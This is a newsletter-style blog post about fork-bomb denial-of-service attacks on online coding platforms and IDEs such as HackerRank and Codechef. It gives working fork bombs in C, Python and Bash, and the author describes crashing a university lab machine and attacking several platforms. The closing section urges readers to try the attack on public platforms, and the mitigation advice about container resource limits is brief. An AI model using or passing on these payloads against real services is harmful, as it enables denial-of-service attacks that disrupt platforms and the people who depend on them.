Hacking Online IDEs - Fork Bombing (DoS Attack)

Ever thought about hacking some online IDE such as HackerRank, Codechef, etc ? Do you know what a Fork Bomb is? Hacking is not necessarily "extracting" out information, but anything that compromises the system, causes destruction and leaks can be termed hacking.

Many coding platforms as well as online IDEs have this issue where they allow us to run raw code and play with system's resources..!!

Disclaimer: Please take care while doing this on public platforms as they do Log and Audit which user / IP has performed the actions. It can get you in serious trouble if you do some dangerous actions.

Most awesome coding platforms and IDEs have implemented security measures to prevent or mitigate these attacks, but still a lot of platforms can be compromised due to this.! I have checked and attacked a few myself 😜

So What Exactly is Fork Bombing?

Fork Bombing is when you spin up a process which creates infinite forks of your application on that same system. A fork is a "identical" process spun up by main process which has its own process ID, can live on its own and has some CPU / memory assigned to it. Keeping complications assigned, it's like a new copy of our process, having the exact same code.

So, now suppose we try to have an infinite loop of creating forks which keeps on creating identical process. Each of these process now tries to create forks of its own, and so on and so on....

(Source of picture: Arpit Bhyani's newsletter)

So as you see, this way we create infinite amount of processes, which hogs up your CPU and RAM and crashes the system...!

I Tried this in my University Computer Lab

Yes, true as that. back in my college days, just wrote a very simple python application to bring up new forks in a while True loop and there it was. A few seconds and the whole PC got shut down (Yes, it worked after booting it up again 😂). But do take care of doing this on public applications, and more importantly, check it this doesn't affect your own systems..!!

Creating so many processes results in resources shortage, making other system processes (like the one listening for key strokes) having no CPU and RAM. So, now your computer freezes, has no system cleanup acting and sometimes brings down the whole OS as well as boot system (failure of system backups and disk writes).

How to mitigate / prevent this?

When I say this eats all your CPU and RAM of your "machine" I mean the running instance of your machine. It could be a physical computer, a virtual machine or EC2 or as small as a docker container.

Now, if you run your production load on Kubernetes or Docker Swarm or similar container orchestration tools (fargate, ECS, etc..) you can bring down a single container with this attack. As your system would have tight upper limits on CPU and memory on each container, it'll kill your malicious container and bring up a new one (without your attack code).

Just imagine, what will happen if you forget upper limits on CPU and Memory in your kubernetes cluster..! The cluster itself (or node) will choke and there goes your business down the drain 😂

Let's Break the Systems..!

Let's see how we can create this attack in multiple languages..!

C Implementation

#include <unistd.h>

int main() {
    for(;;) {
        fork();
    }
}        

Python implementation

import os

while True:
    os.fork()
        

Bash implementation

:(){ :|:& };:
        

Conclusion

As you see, it's so simple to bring down a system, just a few lines of code..! And coding platforms and editors are so susceptible to these..! Yes, good major ones have implemented many security measures for these, but do go ahead and try this out..! (Please read disclaimer at top before trying)

I hope you learned something new from this Newsletter. If you liked it, do subscribe, hit 👍 or ❤️, and share this with others. Stay tuned for the next one!